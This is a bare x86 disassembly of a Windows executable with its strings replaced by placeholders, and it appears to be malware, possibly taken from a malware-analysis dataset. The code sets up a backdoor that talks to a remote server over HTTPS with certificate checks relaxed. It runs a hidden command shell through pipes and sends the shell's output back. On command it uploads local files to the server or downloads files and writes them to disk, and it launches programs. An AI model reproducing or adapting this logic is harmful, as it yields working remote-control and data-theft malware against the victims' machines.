sub_401000
mov eax sub_401d88
call sub_401bc0
push ecx
push rw-data
lea ecx [ ebp - 0x10 ]
call sub_40103e
and [ ebp - 0x4 ] 0x0
lea ecx [ ebp - 0x10 ]
call sub_4014f4
or [ ebp - 0x4 ] 0xffffffff
lea ecx [ ebp - 0x10 ]
call sub_401bb6
mov ecx [ ebp - 0xc ]
xor eax eax
mov [ fs : 0x0 ] ecx
leave
retn
sub_401049
push esi
mov esi [ esp + 0x8 ]
push esi
call strlen
pop ecx
mov ecx [ esp + 0x10 ]
cmp ecx eax
jg r-xdata
or eax 0xffffffff
jmp r-xdata
push [ esp + 0xc ]
lea eax [ esi + ecx ]
push eax
call [ strstr@IAT ]
pop ecx
test eax eax
pop ecx
jne r-xdata
pop esi
retn 0xc
sub eax esi
sub_40107c
push ebp
mov ebp esp
push ebx
mov ebx [ ebp + 0xc ]
push edi
mov edi ecx
push [ ebp + 0x18 ]
push 0x3ff
push ebx
push [ ebp + 0x8 ]
call [ InternetReadFile@IAT ]
test eax eax
jne r-xdata
push esi
push 0x0
push rw-data
push ebx
mov ecx edi
call sub_401049
mov esi eax
mov ecx edi
lea eax [ esi + 0x8 ]
push eax
push rw-data
push ebx
call sub_401049
cmp esi 0xffffffff
je r-xdata
xor al al
jmp r-xdata
push ebx
call strlen
push eax
push ebx
push [ ebp + 0x10 ]
call memcpy
add esp 0x10
cmp eax 0xffffffff
je r-xdata
pop edi
pop ebx
pop ebp
retn 0x14
sub eax esi
lea edi [ eax - 0xa ]
lea eax [ esi + ebx + 0x8 ]
push edi
push eax
push [ ebp + 0x10 ]
call memcpy
mov eax [ ebp + 0x18 ]
add esp 0xc
mov [ eax ] edi
jmp r-xdata
mov al 0x1
pop esi
sub_401106
push ebp
mov ebp esp
sub esp 0xc68
push ebx
push esi
push edi
mov [ ebp - 0x10 ] ecx
push 0x9
xor ebx ebx
pop ecx
xor eax eax
lea edi [ ebp - 0x40 ]
mov [ ebp - 0x44 ] ebx
[ edi ]
mov eax [ ebp + 0x10 ]
imul eax eax 0x1f4
push eax
mov [ ebp - 0x14 ] eax
call ??2@YAPAXI@Z
mov [ esp ] rw-data
push [ ebp + 0xc ]
mov [ ebp - 0x4 ] eax
mov [ ebp - 0x44 ] 0x28
call [ fopen@IAT ]
mov esi eax
pop ecx
cmp esi ebx
pop ecx
mov [ ebp - 0x8 ] esi
jne r-xdata
push 0x2
push ebx
push esi
call [ fseek@IAT ]
push esi
call [ ftell@IAT ]
push 0x5c
mov [ ebp - 0xc ] eax
push [ ebp + 0xc ]
call [ strrchr@IAT ]
mov esi 0xff
mov edx eax
mov ecx esi
xor eax eax
lea edi [ ebp - 0x467 ]
push [ ebp + 0x10 ]
mov [ ebp - 0x468 ] bl
inc edx
[ edi ]
push [ ebp - 0xc ]
stosw [ edi ]
stosb [ edi ]
push edx
lea eax [ ebp - 0x468 ]
push rw-data
push eax
call [ sprintf@IAT ]
lea eax [ ebp - 0x468 ]
push eax
call strlen
add esp 0x30
push eax
lea eax [ ebp - 0x468 ]
push eax
push ebx
push ebx
push [ ebp + 0x8 ]
call [ HttpSendRequestA@IAT ]
test eax eax
je r-xdata
push 0x8
mov esi rw-data
pop ecx
lea edi [ ebp - 0x68 ]
[ edi ] [ esi ]
lea eax [ ebp - 0x68 ]
push eax
movsb [ edi ] [ esi ]
call strlen
pop ecx
push eax
lea eax [ ebp - 0x68 ]
push eax
push ebx
push ebx
push [ ebp + 0x8 ]
call [ HttpSendRequestA@IAT ]
test eax eax
jne r-xdata
xor eax eax
jmp r-xdata
mov ecx esi
xor eax eax
lea edi [ ebp - 0xc67 ]
mov [ ebp - 0xc68 ] bl
[ edi ]
stosw [ edi ]
stosb [ edi ]
mov ecx esi
xor eax eax
lea edi [ ebp - 0x867 ]
mov [ ebp - 0x868 ] bl
[ edi ]
stosw [ edi ]
stosb [ edi ]
lea eax [ ebp - 0x18 ]
mov ecx [ ebp - 0x10 ]
push eax
lea eax [ ebp - 0x868 ]
push 0x3ff
push eax
lea eax [ ebp - 0xc68 ]
push eax
push [ ebp + 0x8 ]
call sub_40107c
test al al
je r-xdata
push ebx
pop edi
pop esi
pop ebx
leave
retn 0xc
lea eax [ ebp - 0x868 ]
push rw-data
push eax
call strcmp
pop ecx
test eax eax
pop ecx
jne r-xdata
push [ ebp - 0x8 ]
jmp r-xdata
push ebx
push 0x8
lea eax [ ebp - 0x44 ]
push ebx
push eax
push [ ebp + 0x8 ]
call [ HttpSendRequestExA@IAT ]
test eax eax
je r-xdata
call [ fclose@IAT ]
pop ecx
xor edi edi
cmp [ ebp - 0xc ] ebx
je r-xdata
cmp [ ebp - 0x4 ] ebx
je r-xdata
push 0x5
call [ Sleep@IAT ]
mov eax [ ebp - 0xc ]
mov esi [ ebp - 0x14 ]
sub eax edi
cmp eax esi
ja r-xdata
push [ ebp - 0x8 ]
call [ fclose@IAT ]
pop ecx
push ebx
push ebx
push ebx
push [ ebp + 0x8 ]
call [ HttpEndRequestA@IAT ]
neg eax
sbb eax eax
neg eax
push [ ebp - 0x4 ]
call ??3@YAXPAX@Z
pop ecx
push ebx
push edi
push [ ebp - 0x8 ]
call [ fseek@IAT ]
push [ ebp - 0x8 ]
push esi
push 0x1
push [ ebp - 0x4 ]
call [ fread@IAT ]
add esp 0x1c
lea eax [ ebp - 0x1c ]
push eax
push esi
push [ ebp - 0x4 ]
push [ ebp + 0x8 ]
call [ InternetWriteFile@IAT ]
test eax eax
je r-xdata
mov esi eax
cmp [ ebp - 0x4 ] ebx
je r-xdata
add edi esi
cmp [ ebp - 0xc ] edi
jne r-xdata
push [ ebp - 0x4 ]
call ??3@YAXPAX@Z
pop ecx
sub_40133a
push ebp
mov ebp esp
sub esp 0xc0c
push ebx
mov ebx [ ebp + 0xc ]
push esi
push edi
push 0x5c
mov [ ebp - 0x4 ] ecx
push ebx
call [ strrchr@IAT ]
pop ecx
inc eax
pop ecx
mov [ ebp - 0x8 ] eax
jne r-xdata
and [ ebp - 0x80c ] 0x0
mov esi 0xff
mov ecx esi
xor eax eax
lea edi [ ebp - 0x80b ]
push [ ebp + 0x10 ]
[ edi ]
stosw [ edi ]
stosb [ edi ]
push ebx
lea eax [ ebp - 0x80c ]
push rw-data
push eax
call [ sprintf@IAT ]
lea eax [ ebp - 0x80c ]
push eax
call strlen
add esp 0x14
mov ebx [ HttpSendRequestA@IAT ]
push eax
lea eax [ ebp - 0x80c ]
push eax
push 0x0
push 0x0
push [ ebp + 0x8 ]
call ebx
test eax eax
je r-xdata
mov [ ebp - 0x8 ] ebx
xor al al
jmp r-xdata
and [ ebp - 0xc0c ] 0x0
mov ecx esi
xor eax eax
lea edi [ ebp - 0xc0b ]
[ edi ]
and [ ebp - 0x40c ] 0x0
mov ecx esi
stosw [ edi ]
stosb [ edi ]
xor eax eax
lea edi [ ebp - 0x40b ]
[ edi ]
stosw [ edi ]
stosb [ edi ]
lea eax [ ebp + 0xc ]
mov ecx [ ebp - 0x4 ]
push eax
lea eax [ ebp - 0x40c ]
push 0x3ff
push eax
lea eax [ ebp - 0xc0c ]
push eax
push [ ebp + 0x8 ]
call sub_40107c
test al al
je r-xdata
pop edi
pop esi
pop ebx
leave
retn 0xc
push 0xc
lea eax [ ebp - 0x40c ]
push rw-data
push eax
call [ _strnicmp@IAT ]
add esp 0xc
test eax eax
jne r-xdata
push eax
push eax
push eax
push eax
push [ ebp + 0x8 ]
call ebx
test eax eax
je r-xdata
lea eax [ ebp - 0x400 ]
push eax
call [ atoi@IAT ]
mov esi eax
lea eax [ esi + 0x1 ]
push eax
call ??2@YAPAXI@Z
pop ecx
mov edi eax
pop ecx
mov eax esi
push 0xa
xor edx edx
pop ecx
mov [ ebp - 0x4 ] edi
mov ebx ecx
mov [ ebp + 0x10 ] ecx
div ebx
mov ebx [ InternetReadFile@IAT ]
mov [ ebp - 0xc ] eax
lea eax [ ebp + 0xc ]
push eax
push [ ebp - 0xc ]
push edi
push [ ebp + 0x8 ]
call ebx
add edi [ ebp + 0xc ]
dec [ ebp + 0x10 ]
jne r-xdata
lea eax [ ebp + 0xc ]
push eax
mov eax [ ebp - 0x4 ]
sub eax edi
add eax esi
push eax
push edi
push [ ebp + 0x8 ]
call ebx
mov edi [ ebp - 0x4 ]
push rw-data
push [ ebp - 0x8 ]
and [ edi + esi ] 0x0
call [ fopen@IAT ]
mov ebx eax
pop ecx
test ebx ebx
pop ecx
jne r-xdata
push ebx
push 0x1
push esi
push edi
call [ fwrite@IAT ]
push ebx
call [ fclose@IAT ]
add esp 0x14
test edi edi
je r-xdata
push eax
call [ fclose@IAT ]
pop ecx
mov al 0x1
push edi
call ??3@YAXPAX@Z
pop ecx
sub_4014f4
push ebp
mov ebp esp
mov eax 0x1390
call sub_401c10
push ebx
push esi
push edi
mov [ ebp - 0x10 ] ecx
xor ebx ebx
lea eax [ ebp - 0x48 ]
mov esi [ CreatePipe@IAT ]
push ebx
push eax
lea eax [ ebp - 0x28 ]
mov [ ebp - 0x48 ] 0xc
push eax
lea eax [ ebp - 0x14 ]
push eax
mov [ ebp - 0x44 ] ebx
mov [ ebp - 0x40 ] 0x1
call esi
lea eax [ ebp - 0x48 ]
push ebx
push eax
lea eax [ ebp - 0x18 ]
push eax
lea eax [ ebp - 0x24 ]
push eax
call esi
push 0x44
lea eax [ ebp - 0xcc ]
push ebx
push eax
call memset
mov eax [ ebp - 0x24 ]
add esp 0xc
mov [ ebp - 0x94 ] eax
mov eax [ ebp - 0x28 ]
mov [ ebp - 0x8c ] eax
mov [ ebp - 0x90 ] eax
lea eax [ ebp - 0x6c ]
mov esi rw-data
lea edi [ ebp - 0x88 ]
push eax
lea eax [ ebp - 0xcc ]
mov [ ebp - 0xa0 ] 0x101
movsd [ edi ] [ esi ]
push eax
push ebx
push ebx
push ebx
movsd [ edi ] [ esi ]
push 0x1
push ebx
lea eax [ ebp - 0x88 ]
push ebx
push eax
push ebx
mov [ ebp - 0x9c ] bx
movsd [ edi ] [ esi ]
call [ CreateProcessA@IAT ]
mov edx 0xff
xor eax eax
mov ecx edx
lea edi [ ebp - 0x138f ]
mov [ ebp - 0x1390 ] bl
mov [ ebp - 0x790 ] bl
[ edi ]
stosw [ edi ]
stosb [ edi ]
mov ecx edx
xor eax eax
lea edi [ ebp - 0x78f ]
mov [ ebp - 0xb90 ] bl
[ edi ]
stosw [ edi ]
stosb [ edi ]
mov ecx edx
xor eax eax
lea edi [ ebp - 0xb8f ]
[ edi ]
stosw [ edi ]
stosb [ edi ]
push 0x1388
call [ Sleep@IAT ]
inc [ ebp - 0x4 ]
cmp [ ebp - 0x4 ] 0x6
jge r-xdata
push 0x64
call [ Sleep@IAT ]
mov edi 0x400
lea eax [ ebp - 0x790 ]
push edi
push ebx
push eax
call memset
push edi
lea eax [ ebp - 0x1390 ]
push ebx
push eax
call memset
push edi
lea eax [ ebp - 0xb90 ]
push ebx
push eax
call memset
add esp 0x24
lea eax [ ebp - 0x34 ]
push ebx
push eax
lea eax [ ebp - 0xc ]
push eax
lea eax [ ebp - 0x790 ]
push 0x3ff
push eax
push [ ebp - 0x14 ]
call [ PeekNamedPipe@IAT ]
cmp [ ebp - 0xc ] ebx
je r-xdata
lea eax [ ebp - 0xc ]
push ebx
push eax
lea eax [ ebp - 0x790 ]
push [ ebp - 0xc ]
push eax
push [ ebp - 0x14 ]
call [ ReadFile@IAT ]
test eax eax
je r-xdata
push [ ebp - 0x2c ]
mov esi [ InternetCloseHandle@IAT ]
call esi
push [ ebp - 0x20 ]
call esi
push [ ebp - 0x8 ]
jmp r-xdata
push 0x6
lea ecx [ ebp - 0xc ]
pop eax
push ebx
push ecx
push eax
push rw-data
push [ ebp - 0x18 ]
mov [ ebp - 0xc ] eax
call [ WriteFile@IAT ]
push [ ebp - 0x14 ]
mov esi [ CloseHandle@IAT ]
call esi
push [ ebp - 0x28 ]
call esi
push [ ebp - 0x24 ]
call esi
push [ ebp - 0x18 ]
call esi
push [ ebp - 0x68 ]
call esi
push [ ebp - 0x6c ]
call esi
push [ ebp - 0x8 ]
mov esi [ InternetCloseHandle@IAT ]
call esi
push [ ebp - 0x20 ]
call esi
push [ ebp - 0x2c ]
call esi
push 0xea60
call [ Sleep@IAT ]
jmp r-xdata
lea eax [ ebp - 0x790 ]
push eax
call strlen
pop ecx
push eax
lea eax [ ebp - 0x790 ]
push eax
push ebx
push ebx
push [ ebp - 0x8 ]
call [ HttpSendRequestA@IAT ]
test eax eax
je r-xdata
mov esi rw-data
lea edi [ ebp - 0x5c ]
movsd [ edi ] [ esi ]
movsd [ edi ] [ esi ]
movsd [ edi ] [ esi ]
movsd [ edi ] [ esi ]
lea eax [ ebp - 0x5c ]
push eax
movsb [ edi ] [ esi ]
call strlen
pop ecx
push eax
lea eax [ ebp - 0x5c ]
push eax
push ebx
push ebx
push [ ebp - 0x8 ]
call [ HttpSendRequestA@IAT ]
test eax eax
jne r-xdata
push ebx
push ebx
push ebx
mov esi rw-data
push ebx
push esi
mov [ ebp - 0x4 ] ebx
call [ InternetOpenA@IAT ]
mov ecx [ ebp - 0x10 ]
push ebx
push 0x80800000
push 0x3
push esi
push esi
push 0x1bb
mov [ ebp - 0x2c ] eax
push [ ecx ]
push eax
call [ InternetConnectA@IAT ]
push ebx
push 0x80c03000
push ebx
push ebx
push rw-data
push esi
push rw-data
push eax
mov [ ebp - 0x20 ] eax
call [ HttpOpenRequestA@IAT ]
push 0x4
mov [ ebp - 0x8 ] eax
pop edi
lea eax [ ebp - 0x3c ]
push eax
lea eax [ ebp - 0x1c ]
push eax
push 0x1f
push [ ebp - 0x8 ]
mov [ ebp - 0x3c ] edi
call [ InternetQueryOptionA@IAT ]
mov esi [ InternetSetOptionA@IAT ]
or [ ebp - 0x1b ] 0x1
lea eax [ ebp - 0x1c ]
push edi
push eax
push 0x1f
push [ ebp - 0x8 ]
call esi
lea eax [ ebp - 0x38 ]
push edi
push eax
push 0x6
push [ ebp - 0x8 ]
mov [ ebp - 0x38 ] 0x1b7740
call esi
lea eax [ ebp - 0x30 ]
mov esi [ ebp - 0x10 ]
push eax
lea eax [ ebp - 0xb90 ]
push 0x3ff
push eax
lea eax [ ebp - 0x1390 ]
mov ecx esi
push eax
push [ ebp - 0x8 ]
call sub_40107c
test al al
je r-xdata
mov edi [ _strnicmp@IAT ]
push 0x4
lea eax [ ebp - 0xb90 ]
push rw-data
push eax
call edi
add esp 0xc
test eax eax
jne r-xdata
push 0x5
lea eax [ ebp - 0xb90 ]
push rw-data
push eax
call edi
add esp 0xc
test eax eax
jne r-xdata
push 0x400
lea eax [ ebp - 0x790 ]
push ebx
push eax
call memset
push rw-data
jmp r-xdata
push 0x4
lea eax [ ebp - 0xb90 ]
push rw-data
push eax
call edi
add esp 0xc
test eax eax
jne r-xdata
push 0x7f
lea edi [ ebp - 0xf8f ]
pop ecx
mov [ ebp - 0xf90 ] bl
[ edi ]
stosw [ edi ]
stosb [ edi ]
lea eax [ ebp - 0xb90 ]
push eax
call strlen
sub eax 0x6
push eax
lea eax [ ebp - 0xb8a ]
push eax
lea eax [ ebp - 0xf90 ]
push eax
call memcpy
push 0x44
lea eax [ ebp - 0x110 ]
push ebx
push eax
call memset
mov eax [ rw-data ]
push 0x1
pop esi
mov [ ebp - 0xd90 ] eax
mov eax [ rw-data ]
push 0x7e
mov [ ebp - 0xd8c ] eax
pop ecx
xor eax eax
lea edi [ ebp - 0xd88 ]
[ edi ]
lea eax [ ebp - 0xf90 ]
mov [ ebp - 0xe4 ] esi
push eax
lea eax [ ebp - 0xd90 ]
push eax
mov [ ebp - 0xe0 ] bx
call strcat
add esp 0x24
xor eax eax
lea edi [ ebp - 0x18f ]
mov [ ebp - 0x190 ] bl
push 0x1f
pop ecx
[ edi ]
stosw [ edi ]
stosb [ edi ]
lea eax [ ebp - 0x190 ]
push 0x80
push eax
call [ GetWindowsDirectoryA@IAT ]
lea eax [ ebp - 0x190 ]
push rw-data
push eax
call strcat
pop ecx
lea eax [ ebp - 0x7c ]
pop ecx
push eax
lea eax [ ebp - 0x110 ]
push eax
lea eax [ ebp - 0x190 ]
push eax
push ebx
push 0x40
push esi
push ebx
lea eax [ ebp - 0xd90 ]
push ebx
push eax
push ebx
call [ CreateProcessA@IAT ]
test eax eax
je r-xdata
lea eax [ ebp - 0x790 ]
push eax
call strcpy
add esp 0x14
jmp r-xdata
push 0x4
lea eax [ ebp - 0xb90 ]
push rw-data
push eax
call edi
add esp 0xc
test eax eax
jne r-xdata
push 0x3f
lea edi [ ebp - 0x38f ]
pop ecx
mov [ ebp - 0x390 ] bl
[ edi ]
stosw [ edi ]
stosb [ edi ]
lea eax [ ebp - 0x390 ]
mov [ ebp - 0x4 ] ebx
push eax
lea eax [ ebp - 0x4 ]
push eax
lea eax [ ebp - 0xb90 ]
push rw-data
push eax
call [ sscanf@IAT ]
add esp 0x10
lea eax [ ebp - 0x390 ]
mov ecx esi
push ebx
push rw-data
push eax
call sub_401049
cmp [ ebp - 0x4 ] ebx
je r-xdata
push 0x400
lea eax [ ebp - 0x790 ]
push ebx
push eax
call memset
push rw-data
push [ ebp - 0x78 ]
mov edi [ CloseHandle@IAT ]
call edi
push [ ebp - 0x7c ]
call edi
jmp r-xdata
mov eax [ ebp - 0xc ]
cmp eax [ ebp - 0x34 ]
jne r-xdata
push 0x3f
lea edi [ ebp - 0x28f ]
pop ecx
mov [ ebp - 0x290 ] bl
[ edi ]
stosw [ edi ]
stosb [ edi ]
lea eax [ ebp - 0x290 ]
mov [ ebp - 0x4 ] ebx
push eax
lea eax [ ebp - 0x4 ]
push eax
lea eax [ ebp - 0xb90 ]
push rw-data
push eax
call [ sscanf@IAT ]
add esp 0x10
lea eax [ ebp - 0x290 ]
mov ecx esi
push ebx
push rw-data
push eax
call sub_401049
cmp [ ebp - 0x4 ] ebx
je r-xdata
push 0x400
lea eax [ ebp - 0x790 ]
push ebx
push eax
call memset
push rw-data
jmp r-xdata
cmp [ ebp - 0x390 ] bl
je r-xdata
lea eax [ ebp - 0x30 ]
push ebx
push eax
lea eax [ ebp - 0xb90 ]
push [ ebp - 0x30 ]
push eax
push [ ebp - 0x18 ]
call [ WriteFile@IAT ]
test eax eax
je r-xdata
cmp [ ebp - 0x290 ] bl
je r-xdata
cmp eax 0xffffffff
je r-xdata
mov edi [ _strnicmp@IAT ]
push 0x5
lea eax [ ebp - 0xb90 ]
push rw-data
push eax
call edi
add esp 0xc
test eax eax
je r-xdata
cmp eax 0xffffffff
je r-xdata
push 0x14
pop eax
cmp [ ebp - 0x4 ] eax
jle r-xdata
mov eax [ rw-data ]
mov [ ebp - 0x10 ] eax
lea eax [ ebp - 0x10 ]
push eax
call strlen
pop ecx
push eax
lea eax [ ebp - 0x10 ]
push eax
push ebx
push ebx
push [ ebp - 0x8 ]
call [ HttpSendRequestA@IAT ]
push [ ebp - 0x14 ]
mov esi [ CloseHandle@IAT ]
call esi
push [ ebp - 0x28 ]
call esi
push [ ebp - 0x24 ]
call esi
push [ ebp - 0x18 ]
call esi
push [ ebp - 0x68 ]
call esi
push [ ebp - 0x6c ]
call esi
push [ ebp - 0x8 ]
mov esi [ InternetCloseHandle@IAT ]
call esi
push [ ebp - 0x20 ]
call esi
push [ ebp - 0x2c ]
jmp r-xdata
push 0x5
lea eax [ ebp - 0xb90 ]
push rw-data
push eax
call edi
add esp 0xc
test eax eax
je r-xdata
push 0x14
pop eax
cmp [ ebp - 0x4 ] eax
jle r-xdata
push [ ebp - 0x4 ]
lea eax [ ebp - 0x390 ]
mov ecx esi
push eax
push [ ebp - 0x8 ]
call sub_401106
jmp r-xdata
mov [ ebp - 0x4 ] eax
call esi
pop edi
pop esi
xor al al
pop ebx
leave
retn
jmp r-xdata
push [ ebp - 0x4 ]
lea eax [ ebp - 0x290 ]
mov ecx esi
push eax
push [ ebp - 0x8 ]
call sub_40133a
mov [ ebp - 0x4 ] eax
sub_401c10
push ecx
cmp eax 0x1000
lea ecx [ esp + 0x8 ]
jb r-xdata
sub ecx eax
mov eax esp
test [ ecx ] eax
mov esp ecx
mov ecx [ eax ]
mov eax [ eax + 0x4 ]
push eax
retn
sub ecx 0x1000
sub eax 0x1000
test [ ecx ] eax
cmp eax 0x1000
jae r-xdata
_start
push ebp
mov ebp esp
push 0xffffffff
push r--data
push _except_handler3
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x20
push ebx
push esi
push edi
mov [ ebp - 0x18 ] esp
and [ ebp - 0x4 ] 0x0
push 0x1
call [ __set_app_type@IAT ]
pop ecx
or [ rw-data ] 0xffffffff
or [ rw-data ] 0xffffffff
call [ __p__fmode@IAT ]
mov ecx [ rw-data ]
mov [ eax ] ecx
call [ __p__commode@IAT ]
mov ecx [ rw-data ]
mov [ eax ] ecx
mov eax [ _adjust_fdiv@IAT ]
mov eax [ eax ]
mov [ rw-data ] eax
call sub_401bb6
cmp [ rw-data ] 0x0
jne r-xdata
call sub_401d5c
push rw-data
push rw-data
call _initterm
mov eax [ rw-data ]
mov [ ebp - 0x28 ] eax
lea eax [ ebp - 0x28 ]
push eax
push [ rw-data ]
lea eax [ ebp - 0x20 ]
push eax
lea eax [ ebp - 0x2c ]
push eax
lea eax [ ebp - 0x1c ]
push eax
call [ __getmainargs@IAT ]
push rw-data
push rw-data
call _initterm
call [ __p___initenv@IAT ]
mov ecx [ ebp - 0x20 ]
mov [ eax ] ecx
push [ ebp - 0x20 ]
push [ ebp - 0x2c ]
push [ ebp - 0x1c ]
call sub_401000
add esp 0x30
mov [ ebp - 0x24 ] eax
push eax
call [ exit@IAT ]
push sub_401d6e
call [ __setusermatherr@IAT ]
pop ecx
sub_40103e
mov eax ecx
mov ecx [ esp + 0x4 ]
mov [ eax ] ecx
retn 0x4
sub_401bb6
retn
__CxxFrameHandler
jmp [ __CxxFrameHandler@IAT ]
sub_401bc0
push 0xffffffff
push eax
mov eax [ fs : 0x0 ]
push eax
mov eax [ esp + 0xc ]
mov [ fs : 0x0 ] esp
mov [ esp + 0xc ] ebp
lea ebp [ esp + 0xc ]
push eax
retn
strlen
jmp [ strlen@IAT ]
memcpy
jmp [ memcpy@IAT ]
??3@YAXPAX@Z
jmp [ operator delete@IAT ]
strcmp
jmp [ strcmp@IAT ]
??2@YAPAXI@Z
jmp [ operator new@IAT ]
strcpy
jmp [ strcpy@IAT ]
strcat
jmp [ strcat@IAT ]
memset
jmp [ memset@IAT ]
sub_401d43
mov esp [ ebp - 0x18 ]
push [ ebp - 0x30 ]
call [ _exit@IAT ]
int3
_XcptFilter
jmp [ _XcptFilter@IAT ]
_initterm
jmp [ _initterm@IAT ]
sub_401d5c
push 0x30000
push 0x10000
call _controlfp
pop ecx
pop ecx
retn
sub_401d6e
xor eax eax
retn
_except_handler3
jmp [ _except_handler3@IAT ]
_controlfp
jmp [ _controlfp@IAT ]
sub_401d80
lea ecx [ ebp - 0x10 ]
jmp sub_401bb6
sub_401d88
mov eax r--data
jmp __CxxFrameHandler
